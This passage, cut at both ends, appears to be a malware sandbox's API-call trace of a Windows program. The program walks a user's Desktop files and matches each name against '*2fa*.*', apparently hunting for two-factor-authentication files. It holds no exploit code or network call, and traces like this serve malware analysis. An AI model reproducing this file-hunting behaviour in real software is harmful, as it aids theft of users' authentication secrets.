lpMultiByteStr=0x19cae8, cbMultiByte=8, lpWideCharStr=0x29aabb8, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.860] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aabb8 | out: hHeap=0x29a0000) returned 1 [0110.860] PathMatchSpecW (pszFile="6eLLiqLz9t.avi", pszSpec="*2fa*.*") returned 0 [0110.860] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2df8 | out: hHeap=0x29a0000) returned 1 [0110.860] FindNextFileW (in: hFindFile=0x7435a0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe18e7860, ftCreationTime.dwHighDateTime=0x1d7a074, ftLastAccessTime.dwLowDateTime=0x48a8aa90, ftLastAccessTime.dwHighDateTime=0x1d7ab22, ftLastWriteTime.dwLowDateTime=0x48a8aa90, ftLastWriteTime.dwHighDateTime=0x1d7ab22, nFileSizeHigh=0x0, nFileSizeLow=0xdfb2, dwReserved0=0x0, dwReserved1=0x0, cFileName="D9uCaq_HSLxl.pdf", cAlternateFileName="D9UCAQ~1.PDF")) returned 1 [0110.860] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.860] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.860] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="D9uCaq_HSLxl.pdf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf" [0110.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0110.860] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3d) returned 0x29a2ae0 [0110.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf", cchWideChar=61, lpMultiByteStr=0x29a2ae0, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf", lpUsedDefaultChar=0x0) returned 61 [0110.860] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c48 [0110.860] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2ae0 | out: hHeap=0x29a0000) returned 1 [0110.860] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.860] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aaab0 [0110.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=8, lpWideCharStr=0x29aaab0, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.860] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaab0 | out: hHeap=0x29a0000) returned 1 [0110.860] PathMatchSpecW (pszFile="D9uCaq_HSLxl.pdf", pszSpec="*2fa*.*") returned 0 [0110.860] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c48 | out: hHeap=0x29a0000) returned 1 [0110.861] FindNextFileW (in: hFindFile=0x7435a0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8974c4f0, ftCreationTime.dwHighDateTime=0x1d7af73, ftLastAccessTime.dwLowDateTime=0x4d8c28d0, ftLastAccessTime.dwHighDateTime=0x1d7b012, ftLastWriteTime.dwLowDateTime=0x4d8c28d0, ftLastWriteTime.dwHighDateTime=0x1d7b012, nFileSizeHigh=0x0, nFileSizeLow=0x7537, dwReserved0=0x0, dwReserved1=0x0, cFileName="E144W5Mz.swf", cAlternateFileName="")) returned 1 [0110.861] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.861] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.861] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="E144W5Mz.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\E144W5Mz.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\E144W5Mz.swf" [0110.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\E144W5Mz.swf", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0110.861] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x39) returned 0x29a2b28 [0110.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\E144W5Mz.swf", cchWideChar=57, lpMultiByteStr=0x29a2b28, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\E144W5Mz.swf", lpUsedDefaultChar=0x0) returned 57 [0110.861] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2930 [0110.861] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2b28 | out: hHeap=0x29a0000) returned 1 [0110.861] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.861] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aac48 [0110.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=8, lpWideCharStr=0x29aac48, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.861] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac48 | out: hHeap=0x29a0000) returned 1 [0110.861] PathMatchSpecW (pszFile="E144W5Mz.swf", pszSpec="*2fa*.*") returned 0 [0110.861] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2930 | out: hHeap=0x29a0000) returned 1 [0110.861] FindNextFileW (in: hFindFile=0x7435a0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd254fcd0, ftCreationTime.dwHighDateTime=0x1d7a618, ftLastAccessTime.dwLowDateTime=0x8a464820, ftLastAccessTime.dwHighDateTime=0x1d7aac5, ftLastWriteTime.dwLowDateTime=0x8a464820, ftLastWriteTime.dwHighDateTime=0x1d7aac5, nFileSizeHigh=0x0, nFileSizeLow=0xbc6a, dwReserved0=0x0, dwReserved1=0x0, cFileName="lDOubGqNdXLFW1EA.wav", cAlternateFileName="LDOUBG~1.WAV")) returned 1 [0110.861] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.861] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.861] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="lDOubGqNdXLFW1EA.wav" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav" [0110.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0110.861] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x41) returned 0x39700d0 [0110.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav", cchWideChar=65, lpMultiByteStr=0x39700d0, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav", lpUsedDefaultChar=0x0) returned 65 [0110.861] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eaf20 [0110.862] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.862] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.862] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aac18 [0110.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=8, lpWideCharStr=0x29aac18, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.862] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac18 | out: hHeap=0x29a0000) returned 1 [0110.862] PathMatchSpecW (pszFile="lDOubGqNdXLFW1EA.wav", pszSpec="*2fa*.*") returned 0 [0110.862] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eaf20 | out: hHeap=0x29a0000) returned 1 [0110.862] FindNextFileW (in: hFindFile=0x7435a0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4da7350, ftCreationTime.dwHighDateTime=0x1d79ff8, ftLastAccessTime.dwLowDateTime=0x83641e80, ftLastAccessTime.dwHighDateTime=0x1d7ac8a, ftLastWriteTime.dwLowDateTime=0x83641e80, ftLastWriteTime.dwHighDateTime=0x1d7ac8a, nFileSizeHigh=0x0, nFileSizeLow=0x10bdd, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFSiahfxrlNjf.swf", cAlternateFileName="OFSIAH~1.SWF")) returned 1 [0110.862] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.862] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.862] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="OFSiahfxrlNjf.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf" [0110.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0110.862] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3e) returned 0x29a2ae0 [0110.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf", cchWideChar=62, lpMultiByteStr=0x29a2ae0, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf", lpUsedDefaultChar=0x0) returned 62 [0110.862] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c48 [0110.862] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2ae0 | out: hHeap=0x29a0000) returned 1 [0110.862] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.862] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aabb8 [0110.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=8, lpWideCharStr=0x29aabb8, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.862] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aabb8 | out: hHeap=0x29a0000) returned 1 [0110.862] PathMatchSpecW (pszFile="OFSiahfxrlNjf.swf", pszSpec="*2fa*.*") returned 0 [0110.862] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c48 | out: hHeap=0x29a0000) returned 1 [0110.862] FindNextFileW (in: hFindFile=0x7435a0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52198c70, ftCreationTime.dwHighDateTime=0x1d7a68b, ftLastAccessTime.dwLowDateTime=0xa83a5210, ftLastAccessTime.dwHighDateTime=0x1d7b022, ftLastWriteTime.dwLowDateTime=0xa83a5210, ftLastWriteTime.dwHighDateTime=0x1d7b022, nFileSizeHigh=0x0, nFileSizeLow=0x10237, dwReserved0=0x0, dwReserved1=0x0, cFileName="ws8IgIZUQH.mkv", cAlternateFileName="WS8IGI~1.MKV")) returned 1 [0110.862] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.862] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.862] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="ws8IgIZUQH.mkv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\ws8IgIZUQH.mkv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\ws8IgIZUQH.mkv" [0110.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\ws8IgIZUQH.mkv", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0110.863] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3b) returned 0x29a28e8 [0110.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\ws8IgIZUQH.mkv", cchWideChar=59, lpMultiByteStr=0x29a28e8, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\ws8IgIZUQH.mkv", lpUsedDefaultChar=0x0) returned 59 [0110.863] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2a08 [0110.863] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a28e8 | out: hHeap=0x29a0000) returned 1 [0110.863] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.863] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aab28 [0110.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=8, lpWideCharStr=0x29aab28, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.863] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab28 | out: hHeap=0x29a0000) returned 1 [0110.863] PathMatchSpecW (pszFile="ws8IgIZUQH.mkv", pszSpec="*2fa*.*") returned 0 [0110.863] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2a08 | out: hHeap=0x29a0000) returned 1 [0110.863] FindNextFileW (in: hFindFile=0x7435a0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34f22090, ftCreationTime.dwHighDateTime=0x1d7accf, ftLastAccessTime.dwLowDateTime=0x925b6d20, ftLastAccessTime.dwHighDateTime=0x1d7b04b, ftLastWriteTime.dwLowDateTime=0x925b6d20, ftLastWriteTime.dwHighDateTime=0x1d7b04b, nFileSizeHigh=0x0, nFileSizeLow=0x40eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Y_Iia0ILxn.gif", cAlternateFileName="Y_IIA0~1.GIF")) returned 1 [0110.863] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.863] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.863] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="Y_Iia0ILxn.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\Y_Iia0ILxn.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\Y_Iia0ILxn.gif" [0110.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\Y_Iia0ILxn.gif", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0110.863] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3b) returned 0x29a2ae0 [0110.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\Y_Iia0ILxn.gif", cchWideChar=59, lpMultiByteStr=0x29a2ae0, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\Y_Iia0ILxn.gif", lpUsedDefaultChar=0x0) returned 59 [0110.863] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a27c8 [0110.863] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2ae0 | out: hHeap=0x29a0000) returned 1 [0110.863] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.863] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aaae0 [0110.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=8, lpWideCharStr=0x29aaae0, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.863] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaae0 | out: hHeap=0x29a0000) returned 1 [0110.863] PathMatchSpecW (pszFile="Y_Iia0ILxn.gif", pszSpec="*2fa*.*") returned 0 [0110.863] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a27c8 | out: hHeap=0x29a0000) returned 1 [0110.863] FindNextFileW (in: hFindFile=0x7435a0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34f22090, ftCreationTime.dwHighDateTime=0x1d7accf, ftLastAccessTime.dwLowDateTime=0x925b6d20, ftLastAccessTime.dwHighDateTime=0x1d7b04b, ftLastWriteTime.dwLowDateTime=0x925b6d20, ftLastWriteTime.dwHighDateTime=0x1d7b04b, nFileSizeHigh=0x0, nFileSizeLow=0x40eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Y_Iia0ILxn.gif", cAlternateFileName="Y_IIA0~1.GIF")) returned 0 [0110.864] FindClose (in: hFindFile=0x7435a0 | out: hFindFile=0x7435a0) returned 1 [0110.864] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0110.864] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2c) returned 0x39700d0 [0110.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", cchWideChar=44, lpMultiByteStr=0x39700d0, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpUsedDefaultChar=0x0) returned 44 [0110.864] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.864] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.864] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.864] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aab58 [0110.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aab58, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.864] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab58 | out: hHeap=0x29a0000) returned 1 [0110.864] PathMatchSpecW (pszFile="p B1LdDcHaeS", pszSpec="*2fa*.*") returned 0 [0110.864] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.864] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89c892e0, ftCreationTime.dwHighDateTime=0x1d7a502, ftLastAccessTime.dwLowDateTime=0x959e5ed0, ftLastAccessTime.dwHighDateTime=0x1d7a5a5, ftLastWriteTime.dwLowDateTime=0x959e5ed0, ftLastWriteTime.dwHighDateTime=0x1d7a5a5, nFileSizeHigh=0x0, nFileSizeLow=0x12c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKW-syaNOG91rV.gif", cAlternateFileName="PKW-SY~1.GIF")) returned 1 [0110.864] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.864] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.864] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="PKW-syaNOG91rV.gif" | 